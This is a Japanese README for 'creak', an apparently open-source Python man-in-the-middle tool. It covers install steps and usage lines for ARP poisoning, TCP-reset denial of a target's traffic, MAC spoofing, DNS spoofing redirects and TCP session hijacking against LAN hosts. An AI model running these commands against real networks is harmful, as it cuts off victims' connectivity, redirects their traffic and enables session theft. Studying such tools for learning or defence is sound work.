
ポイズン、リセット、スプーフ、リダイレクトのMITMスクリプト
ローカルネットワーク上のターゲットアドレスに対して、最も有名なMITM攻撃のいくつかを実行します。その中には、ARPポイズニング攻撃を実行し、ルーターへのすべてのリクエストにTCPリセットパケットを送信することで、ターゲットホストのネットワーク通信およびダウンロード機能を拒否するものがあります。 Python言語学習のための教育プロジェクトとして生まれたものであり、このコードの悪意のある使用や違法な使用を含む一切の悪用について、私は責任を負いません。
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
または、単にリポジトリをクローンし、すべての要件がインストールされた後に creak.py を実行することもできます。
$ git clone https://github.com/codepr/creak.git
生のパケット操作には pcap ライブラリと dpkt モジュールがインストールされている必要があります。DNSスプーフィングオプションには、libdnet パッケージの dnet モジュールが必要です(pydnet(ネットワーク評価ツール)モジュールと混同しないでください)。
必要に応じて scapy を使用することもでき、config ファイルの > セクションで設定できます。
[output]ENGINEUsage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
最も基本的な使用法: ターゲットホストへのすべてのトラフィックを拒否
$ python creak.py -t 192.168.1.30 wlan0
異なるゲートウェイを設定:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
デバイスに異なるMACアドレスを設定:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
MACアドレスを偽装して偽のアドレスを生成:
$ python creak.py -x -t 192.168.1.30 wlan0
メーカー(例: Xeros)に基づいてMACアドレスを偽装:
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
偽のMACアドレスを使用したDNSスプーフィング。ab.xy を cd.xz(例: localhost)にリダイレクト:
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
サブネット内の複数のホストを拒否:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
CHANGELOG ファイルを参照してください。
Scapy サポートの完了(開始済み)ライセンスの権利と制限については LICENSE ファイルを参照してください(GNU v3)。